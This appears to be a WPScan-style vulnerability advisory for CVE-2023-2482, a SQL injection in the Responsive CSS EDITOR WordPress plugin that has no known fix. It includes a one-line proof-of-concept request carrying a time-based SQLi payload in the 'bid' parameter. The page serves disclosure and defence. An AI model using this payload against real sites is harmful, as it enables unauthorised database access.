WordPress Plugin Vulnerabilities

Responsive CSS EDITOR <= 1.0 - Admin+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admin.

Proof of Concept

1. Send a request with the payload: /wp-admin/admin.php?page=responsive_css_editor_setting&updateorder=false&deletebreakpoints=true&bid=(select*from(select(sleep(5)))a)
2. See SQLi

Affects Plugins

Plugin icon
responsive-css-editor
No known fix

References

CVE
CVE-2023-2482

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
4.1 (medium)

Miscellaneous

Original Researcher
Chien Vuong
Submitter
Chien Vuong
Verified
Yes
WPVDB ID
c0f73781-be7e-482e-91de-ad7991ad4bd5

Timeline

Publicly Published
2023-06-05 (about 11 months ago)
Added
2023-06-05 (about 11 months ago)
Last Updated
2023-06-05 (about 11 months ago)

Other

Published
Title
Published
2023-12-28
Title
Events Shortcodes & Templates For The Events Calendar < 2.3.2 - Authenticated (Contributor+) SQL Injection via shortcode
Published
2014-08-01
Title
Simple Login Log - SQL Injection
Published
2014-08-01
Title
Global Flash Galleries - popup.php id Parameter SQL Injection
Published
2014-08-01
Title
Plg Novana - wp-content/plugins/plg_novana/novana_detail.php id Parameter SQL Injection
Published
2024-01-03
Title
Randomize <= 1.4.3 - Authenticated (Contributor+) SQL Injection